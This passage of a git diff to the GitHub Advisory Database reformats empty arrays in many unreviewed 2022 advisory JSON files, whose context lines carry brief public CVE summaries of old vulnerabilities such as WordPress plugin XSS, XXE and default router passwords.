--- a/advisories/unreviewed/2022/05/GHSA-6fjv-rgvm-7x24/GHSA-6fjv-rgvm-7x24.json
+++ b/advisories/unreviewed/2022/05/GHSA-6fjv-rgvm-7x24/GHSA-6fjv-rgvm-7x24.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6g4v-wpgv-gp6c/GHSA-6g4v-wpgv-gp6c.json b/advisories/unreviewed/2022/05/GHSA-6g4v-wpgv-gp6c/GHSA-6g4v-wpgv-gp6c.json
index 07632901d31..243682e2f49 100644
--- a/advisories/unreviewed/2022/05/GHSA-6g4v-wpgv-gp6c/GHSA-6g4v-wpgv-gp6c.json
+++ b/advisories/unreviewed/2022/05/GHSA-6g4v-wpgv-gp6c/GHSA-6g4v-wpgv-gp6c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-6g69-jrpm-4wp2/GHSA-6g69-jrpm-4wp2.json b/advisories/unreviewed/2022/05/GHSA-6g69-jrpm-4wp2/GHSA-6g69-jrpm-4wp2.json
index aa8f71fa57f..24829c5c55e 100644
--- a/advisories/unreviewed/2022/05/GHSA-6g69-jrpm-4wp2/GHSA-6g69-jrpm-4wp2.json
+++ b/advisories/unreviewed/2022/05/GHSA-6g69-jrpm-4wp2/GHSA-6g69-jrpm-4wp2.json
@@ -7,12 +7,8 @@
"CVE-2014-3485"
],
"details": "The REST API in the ovirt-engine in oVirt, as used in Red Hat Enterprise Virtualization (rhevm) 3.4, allows remote authenticated users to read arbitrary files and have other unspecified impact via unknown vectors, related to an XML External Entity (XXE) issue.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6gjr-pq9v-gx94/GHSA-6gjr-pq9v-gx94.json b/advisories/unreviewed/2022/05/GHSA-6gjr-pq9v-gx94/GHSA-6gjr-pq9v-gx94.json
index 7d35457dac5..45d9030e48f 100644
--- a/advisories/unreviewed/2022/05/GHSA-6gjr-pq9v-gx94/GHSA-6gjr-pq9v-gx94.json
+++ b/advisories/unreviewed/2022/05/GHSA-6gjr-pq9v-gx94/GHSA-6gjr-pq9v-gx94.json
@@ -7,12 +7,8 @@
"CVE-2014-2950"
],
"details": "Datum Systems SnIP on PSM-500 and PSM-4500 devices does not require authentication for FTP sessions, which allows remote attackers to obtain sensitive information via RETR commands.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-6gr4-4427-r4w7/GHSA-6gr4-4427-r4w7.json b/advisories/unreviewed/2022/05/GHSA-6gr4-4427-r4w7/GHSA-6gr4-4427-r4w7.json
index 2ea075c424f..ed34ee5034c 100644
--- a/advisories/unreviewed/2022/05/GHSA-6gr4-4427-r4w7/GHSA-6gr4-4427-r4w7.json
+++ b/advisories/unreviewed/2022/05/GHSA-6gr4-4427-r4w7/GHSA-6gr4-4427-r4w7.json
@@ -7,12 +7,8 @@
"CVE-2014-4565"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in vcc.js.php in the Verification Code for Comments plugin 2.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) vp, (2) vs, (3) l, (4) vu, or (5) vm parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6j76-px98-ff8f/GHSA-6j76-px98-ff8f.json b/advisories/unreviewed/2022/05/GHSA-6j76-px98-ff8f/GHSA-6j76-px98-ff8f.json
index 279ac1af481..fca48bec8a5 100644
--- a/advisories/unreviewed/2022/05/GHSA-6j76-px98-ff8f/GHSA-6j76-px98-ff8f.json
+++ b/advisories/unreviewed/2022/05/GHSA-6j76-px98-ff8f/GHSA-6j76-px98-ff8f.json
@@ -7,12 +7,8 @@
"CVE-2014-4604"
],
"details": "Cross-site scripting (XSS) vulnerability in settings/pwsettings.php in the Your Text Manager plugin 0.3.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the ytmpw parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6j79-p574-2v97/GHSA-6j79-p574-2v97.json b/advisories/unreviewed/2022/05/GHSA-6j79-p574-2v97/GHSA-6j79-p574-2v97.json
index e4697850070..2a6fcaf29f3 100644
--- a/advisories/unreviewed/2022/05/GHSA-6j79-p574-2v97/GHSA-6j79-p574-2v97.json
+++ b/advisories/unreviewed/2022/05/GHSA-6j79-p574-2v97/GHSA-6j79-p574-2v97.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6jmv-rp6j-xp29/GHSA-6jmv-rp6j-xp29.json b/advisories/unreviewed/2022/05/GHSA-6jmv-rp6j-xp29/GHSA-6jmv-rp6j-xp29.json
index fcd822390a1..a5d5d74c8cd 100644
--- a/advisories/unreviewed/2022/05/GHSA-6jmv-rp6j-xp29/GHSA-6jmv-rp6j-xp29.json
+++ b/advisories/unreviewed/2022/05/GHSA-6jmv-rp6j-xp29/GHSA-6jmv-rp6j-xp29.json
@@ -7,12 +7,8 @@
"CVE-2014-4720"
],
"details": "Email::Address module before 1.904 for Perl uses an inefficient regular expression, which allows remote attackers to cause a denial of service (CPU consumption) via vectors related to \"backtracking into the phrase,\" a different vulnerability than CVE-2014-0477.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-6mx7-73ww-9v6x/GHSA-6mx7-73ww-9v6x.json b/advisories/unreviewed/2022/05/GHSA-6mx7-73ww-9v6x/GHSA-6mx7-73ww-9v6x.json
index c5ab275a436..d0879e27a83 100644
--- a/advisories/unreviewed/2022/05/GHSA-6mx7-73ww-9v6x/GHSA-6mx7-73ww-9v6x.json
+++ b/advisories/unreviewed/2022/05/GHSA-6mx7-73ww-9v6x/GHSA-6mx7-73ww-9v6x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6p7m-f494-cjvp/GHSA-6p7m-f494-cjvp.json b/advisories/unreviewed/2022/05/GHSA-6p7m-f494-cjvp/GHSA-6p7m-f494-cjvp.json
index 6f2ac6cba57..65f00e76828 100644
--- a/advisories/unreviewed/2022/05/GHSA-6p7m-f494-cjvp/GHSA-6p7m-f494-cjvp.json
+++ b/advisories/unreviewed/2022/05/GHSA-6p7m-f494-cjvp/GHSA-6p7m-f494-cjvp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6qwh-j325-grp2/GHSA-6qwh-j325-grp2.json b/advisories/unreviewed/2022/05/GHSA-6qwh-j325-grp2/GHSA-6qwh-j325-grp2.json
index 16d7502446f..f7484e20436 100644
--- a/advisories/unreviewed/2022/05/GHSA-6qwh-j325-grp2/GHSA-6qwh-j325-grp2.json
+++ b/advisories/unreviewed/2022/05/GHSA-6qwh-j325-grp2/GHSA-6qwh-j325-grp2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6rjr-cg8x-gc8f/GHSA-6rjr-cg8x-gc8f.json b/advisories/unreviewed/2022/05/GHSA-6rjr-cg8x-gc8f/GHSA-6rjr-cg8x-gc8f.json
index 98a2ca2038e..d3ef1358528 100644
--- a/advisories/unreviewed/2022/05/GHSA-6rjr-cg8x-gc8f/GHSA-6rjr-cg8x-gc8f.json
+++ b/advisories/unreviewed/2022/05/GHSA-6rjr-cg8x-gc8f/GHSA-6rjr-cg8x-gc8f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6wc5-gj57-fp7q/GHSA-6wc5-gj57-fp7q.json b/advisories/unreviewed/2022/05/GHSA-6wc5-gj57-fp7q/GHSA-6wc5-gj57-fp7q.json
index d4127d51915..7418c88f3b2 100644
--- a/advisories/unreviewed/2022/05/GHSA-6wc5-gj57-fp7q/GHSA-6wc5-gj57-fp7q.json
+++ b/advisories/unreviewed/2022/05/GHSA-6wc5-gj57-fp7q/GHSA-6wc5-gj57-fp7q.json
@@ -7,12 +7,8 @@
"CVE-2014-4723"
],
"details": "Cross-site scripting (XSS) vulnerability in the Easy Banners plugin 1.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter to wp-admin/options-general.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-6x55-2hvm-xqpr/GHSA-6x55-2hvm-xqpr.json b/advisories/unreviewed/2022/05/GHSA-6x55-2hvm-xqpr/GHSA-6x55-2hvm-xqpr.json
index 9b9e01f2754..44dc3864c8c 100644
--- a/advisories/unreviewed/2022/05/GHSA-6x55-2hvm-xqpr/GHSA-6x55-2hvm-xqpr.json
+++ b/advisories/unreviewed/2022/05/GHSA-6x55-2hvm-xqpr/GHSA-6x55-2hvm-xqpr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-7429-7ch3-hxxp/GHSA-7429-7ch3-hxxp.json b/advisories/unreviewed/2022/05/GHSA-7429-7ch3-hxxp/GHSA-7429-7ch3-hxxp.json
index 736d53f060c..d0a4bc077d7 100644
--- a/advisories/unreviewed/2022/05/GHSA-7429-7ch3-hxxp/GHSA-7429-7ch3-hxxp.json
+++ b/advisories/unreviewed/2022/05/GHSA-7429-7ch3-hxxp/GHSA-7429-7ch3-hxxp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-74p5-wh3g-f9rh/GHSA-74p5-wh3g-f9rh.json b/advisories/unreviewed/2022/05/GHSA-74p5-wh3g-f9rh/GHSA-74p5-wh3g-f9rh.json
index bc6605515eb..ceae6150e5e 100644
--- a/advisories/unreviewed/2022/05/GHSA-74p5-wh3g-f9rh/GHSA-74p5-wh3g-f9rh.json
+++ b/advisories/unreviewed/2022/05/GHSA-74p5-wh3g-f9rh/GHSA-74p5-wh3g-f9rh.json
@@ -7,12 +7,8 @@
"CVE-2014-3045"
],
"details": "IBM Scale Out Network Attached Storage (SONAS) 1.3.x and 1.4.x before 1.4.3.3 places an administrative password in the shell history upon use of the -p option to chuser, which allows local users to obtain sensitive information by leveraging root access.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-75f9-mm5v-2rgm/GHSA-75f9-mm5v-2rgm.json b/advisories/unreviewed/2022/05/GHSA-75f9-mm5v-2rgm/GHSA-75f9-mm5v-2rgm.json
index 3018aa2502f..c0863aef3ba 100644
--- a/advisories/unreviewed/2022/05/GHSA-75f9-mm5v-2rgm/GHSA-75f9-mm5v-2rgm.json
+++ b/advisories/unreviewed/2022/05/GHSA-75f9-mm5v-2rgm/GHSA-75f9-mm5v-2rgm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json b/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json
index 18671e0363f..baf92036fd2 100644
--- a/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json
+++ b/advisories/unreviewed/2022/05/GHSA-777c-wmxv-2wcq/GHSA-777c-wmxv-2wcq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7879-3mvp-m36v/GHSA-7879-3mvp-m36v.json b/advisories/unreviewed/2022/05/GHSA-7879-3mvp-m36v/GHSA-7879-3mvp-m36v.json
index 4f99a7b09b0..d27401ec891 100644
--- a/advisories/unreviewed/2022/05/GHSA-7879-3mvp-m36v/GHSA-7879-3mvp-m36v.json
+++ b/advisories/unreviewed/2022/05/GHSA-7879-3mvp-m36v/GHSA-7879-3mvp-m36v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-78rr-8w79-72qw/GHSA-78rr-8w79-72qw.json b/advisories/unreviewed/2022/05/GHSA-78rr-8w79-72qw/GHSA-78rr-8w79-72qw.json
index 4a0e735851b..b97adcbe42a 100644
--- a/advisories/unreviewed/2022/05/GHSA-78rr-8w79-72qw/GHSA-78rr-8w79-72qw.json
+++ b/advisories/unreviewed/2022/05/GHSA-78rr-8w79-72qw/GHSA-78rr-8w79-72qw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7g8r-68cm-p79r/GHSA-7g8r-68cm-p79r.json b/advisories/unreviewed/2022/05/GHSA-7g8r-68cm-p79r/GHSA-7g8r-68cm-p79r.json
index 893ebdd7597..0d04eb6cba9 100644
--- a/advisories/unreviewed/2022/05/GHSA-7g8r-68cm-p79r/GHSA-7g8r-68cm-p79r.json
+++ b/advisories/unreviewed/2022/05/GHSA-7g8r-68cm-p79r/GHSA-7g8r-68cm-p79r.json
@@ -7,12 +7,8 @@
"CVE-2013-2598"
],
"details": "app/aboot/aboot.c in the Little Kernel (LK) bootloader, as distributed with Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to overwrite signature-verification code via crafted boot-image load-destination header values that specify memory locations within bootloader memory.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7gfg-jq7j-vqhw/GHSA-7gfg-jq7j-vqhw.json b/advisories/unreviewed/2022/05/GHSA-7gfg-jq7j-vqhw/GHSA-7gfg-jq7j-vqhw.json
index f67290e254c..a39e5adef1d 100644
--- a/advisories/unreviewed/2022/05/GHSA-7gfg-jq7j-vqhw/GHSA-7gfg-jq7j-vqhw.json
+++ b/advisories/unreviewed/2022/05/GHSA-7gfg-jq7j-vqhw/GHSA-7gfg-jq7j-vqhw.json
@@ -7,12 +7,8 @@
"CVE-2014-4646"
],
"details": "Buffer overflow in the FPDFBookmark_GetTitle method in Foxit PDF SDK DLL before 3.1.1.5005 allows context-dependent attackers to execute arbitrary code via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7m7p-92wq-jrjj/GHSA-7m7p-92wq-jrjj.json b/advisories/unreviewed/2022/05/GHSA-7m7p-92wq-jrjj/GHSA-7m7p-92wq-jrjj.json
index fc91aff0b78..066dcf0cd17 100644
--- a/advisories/unreviewed/2022/05/GHSA-7m7p-92wq-jrjj/GHSA-7m7p-92wq-jrjj.json
+++ b/advisories/unreviewed/2022/05/GHSA-7m7p-92wq-jrjj/GHSA-7m7p-92wq-jrjj.json
@@ -7,12 +7,8 @@
"CVE-2014-5398"
],
"details": "Schneider Electric Wonderware Information Server (WIS) Portal 4.0 SP1 through 5.5 allows remote attackers to read arbitrary files or cause a denial of service via an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7m9j-326v-p83m/GHSA-7m9j-326v-p83m.json b/advisories/unreviewed/2022/05/GHSA-7m9j-326v-p83m/GHSA-7m9j-326v-p83m.json
index df7f6946bcb..bd6450598c1 100644
--- a/advisories/unreviewed/2022/05/GHSA-7m9j-326v-p83m/GHSA-7m9j-326v-p83m.json
+++ b/advisories/unreviewed/2022/05/GHSA-7m9j-326v-p83m/GHSA-7m9j-326v-p83m.json
@@ -7,12 +7,8 @@
"CVE-2014-4576"
],
"details": "Cross-site scripting (XSS) vulnerability in services/diagnostics.php in the WordPress Social Login plugin 2.0.3 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the xhrurl parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7mcv-ggrx-mmh9/GHSA-7mcv-ggrx-mmh9.json b/advisories/unreviewed/2022/05/GHSA-7mcv-ggrx-mmh9/GHSA-7mcv-ggrx-mmh9.json
index 8b4b9875410..7202a32ba7a 100644
--- a/advisories/unreviewed/2022/05/GHSA-7mcv-ggrx-mmh9/GHSA-7mcv-ggrx-mmh9.json
+++ b/advisories/unreviewed/2022/05/GHSA-7mcv-ggrx-mmh9/GHSA-7mcv-ggrx-mmh9.json
@@ -7,12 +7,8 @@
"CVE-2014-4583"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in forms/messages.php in the WP-Contact (wp-contact-sidebar-widget) plugin 1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) edit, (2) order_direction, (3) limit_start, (4) id, or (5) order parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7pp5-xx5q-8pxv/GHSA-7pp5-xx5q-8pxv.json b/advisories/unreviewed/2022/05/GHSA-7pp5-xx5q-8pxv/GHSA-7pp5-xx5q-8pxv.json
index b33b2001800..7809ef39478 100644
--- a/advisories/unreviewed/2022/05/GHSA-7pp5-xx5q-8pxv/GHSA-7pp5-xx5q-8pxv.json
+++ b/advisories/unreviewed/2022/05/GHSA-7pp5-xx5q-8pxv/GHSA-7pp5-xx5q-8pxv.json
@@ -7,12 +7,8 @@
"CVE-2014-0326"
],
"details": "The Pilot Below Deck Equipment (BDE) and OpenPort implementations on Iridium satellite terminals allow remote attackers to read hardcoded credentials via the web interface.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-7pqx-crh9-hcp7/GHSA-7pqx-crh9-hcp7.json b/advisories/unreviewed/2022/05/GHSA-7pqx-crh9-hcp7/GHSA-7pqx-crh9-hcp7.json
index 677c1244888..45f0bc37f97 100644
--- a/advisories/unreviewed/2022/05/GHSA-7pqx-crh9-hcp7/GHSA-7pqx-crh9-hcp7.json
+++ b/advisories/unreviewed/2022/05/GHSA-7pqx-crh9-hcp7/GHSA-7pqx-crh9-hcp7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7v6g-gvc4-hjfj/GHSA-7v6g-gvc4-hjfj.json b/advisories/unreviewed/2022/05/GHSA-7v6g-gvc4-hjfj/GHSA-7v6g-gvc4-hjfj.json
index 991d13181c6..356e13a16f8 100644
--- a/advisories/unreviewed/2022/05/GHSA-7v6g-gvc4-hjfj/GHSA-7v6g-gvc4-hjfj.json
+++ b/advisories/unreviewed/2022/05/GHSA-7v6g-gvc4-hjfj/GHSA-7v6g-gvc4-hjfj.json
@@ -7,12 +7,8 @@
"CVE-2014-4602"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in xencarousel-admin.js.php in the XEN Carousel plugin 0.12.2 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) path or (2) ajaxpath parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7w22-h336-hrv9/GHSA-7w22-h336-hrv9.json b/advisories/unreviewed/2022/05/GHSA-7w22-h336-hrv9/GHSA-7w22-h336-hrv9.json
index 8878e2d78ea..8a3d1569663 100644
--- a/advisories/unreviewed/2022/05/GHSA-7w22-h336-hrv9/GHSA-7w22-h336-hrv9.json
+++ b/advisories/unreviewed/2022/05/GHSA-7w22-h336-hrv9/GHSA-7w22-h336-hrv9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json b/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json
index ca48e9831d1..90048f1e608 100644
--- a/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json
+++ b/advisories/unreviewed/2022/05/GHSA-7w42-h9j5-82q5/GHSA-7w42-h9j5-82q5.json
@@ -7,12 +7,8 @@
"CVE-2008-2575"
],
"details": "cbrPager before 0.9.17 allows user-assisted remote attackers to execute arbitrary commands via shell metacharacters in a (1) ZIP (aka .cbz) or (2) RAR (aka .cbr) archive filename.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-7x69-82vj-v63v/GHSA-7x69-82vj-v63v.json b/advisories/unreviewed/2022/05/GHSA-7x69-82vj-v63v/GHSA-7x69-82vj-v63v.json
index e6407f49d61..dfaa3ef7984 100644
--- a/advisories/unreviewed/2022/05/GHSA-7x69-82vj-v63v/GHSA-7x69-82vj-v63v.json
+++ b/advisories/unreviewed/2022/05/GHSA-7x69-82vj-v63v/GHSA-7x69-82vj-v63v.json
@@ -7,12 +7,8 @@
"CVE-2014-2955"
],
"details": "Raritan PX before 1.5.11 on DPXR20A-16 devices allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-826r-33m8-49vh/GHSA-826r-33m8-49vh.json b/advisories/unreviewed/2022/05/GHSA-826r-33m8-49vh/GHSA-826r-33m8-49vh.json
index fbe65b3b864..50f9c100e1f 100644
--- a/advisories/unreviewed/2022/05/GHSA-826r-33m8-49vh/GHSA-826r-33m8-49vh.json
+++ b/advisories/unreviewed/2022/05/GHSA-826r-33m8-49vh/GHSA-826r-33m8-49vh.json
@@ -7,12 +7,8 @@
"CVE-2014-1987"
],
"details": "The CGI component in Cybozu Garoon 3.1.0 through 3.7 SP3 allows remote attackers to execute arbitrary commands via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-82v8-m558-3xjf/GHSA-82v8-m558-3xjf.json b/advisories/unreviewed/2022/05/GHSA-82v8-m558-3xjf/GHSA-82v8-m558-3xjf.json
index 80a7d63fb62..02277791d3b 100644
--- a/advisories/unreviewed/2022/05/GHSA-82v8-m558-3xjf/GHSA-82v8-m558-3xjf.json
+++ b/advisories/unreviewed/2022/05/GHSA-82v8-m558-3xjf/GHSA-82v8-m558-3xjf.json
@@ -7,12 +7,8 @@
"CVE-2014-5182"
],
"details": "Multiple SQL injection vulnerabilities in the yawpp plugin 1.2 for WordPress allow remote authenticated users with Contributor privileges to execute arbitrary SQL commands via vectors related to (1) admin_functions.php or (2) admin_update.php, as demonstrated by the id parameter in the update action to wp-admin/admin.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-853p-6g7x-mjxh/GHSA-853p-6g7x-mjxh.json b/advisories/unreviewed/2022/05/GHSA-853p-6g7x-mjxh/GHSA-853p-6g7x-mjxh.json
index 7f3aad2bbf9..eca20747dae 100644
--- a/advisories/unreviewed/2022/05/GHSA-853p-6g7x-mjxh/GHSA-853p-6g7x-mjxh.json
+++ b/advisories/unreviewed/2022/05/GHSA-853p-6g7x-mjxh/GHSA-853p-6g7x-mjxh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-872h-3r76-3cv3/GHSA-872h-3r76-3cv3.json b/advisories/unreviewed/2022/05/GHSA-872h-3r76-3cv3/GHSA-872h-3r76-3cv3.json
index 32554b8e226..ca128f3eca2 100644
--- a/advisories/unreviewed/2022/05/GHSA-872h-3r76-3cv3/GHSA-872h-3r76-3cv3.json
+++ b/advisories/unreviewed/2022/05/GHSA-872h-3r76-3cv3/GHSA-872h-3r76-3cv3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8786-r836-vpr3/GHSA-8786-r836-vpr3.json b/advisories/unreviewed/2022/05/GHSA-8786-r836-vpr3/GHSA-8786-r836-vpr3.json
index 843c61aef83..511aa28b8d0 100644
--- a/advisories/unreviewed/2022/05/GHSA-8786-r836-vpr3/GHSA-8786-r836-vpr3.json
+++ b/advisories/unreviewed/2022/05/GHSA-8786-r836-vpr3/GHSA-8786-r836-vpr3.json
@@ -7,12 +7,8 @@
"CVE-2014-4018"
],
"details": "The ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK has a default password of admin for the admin account, which makes it easier for remote attackers to obtain access via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
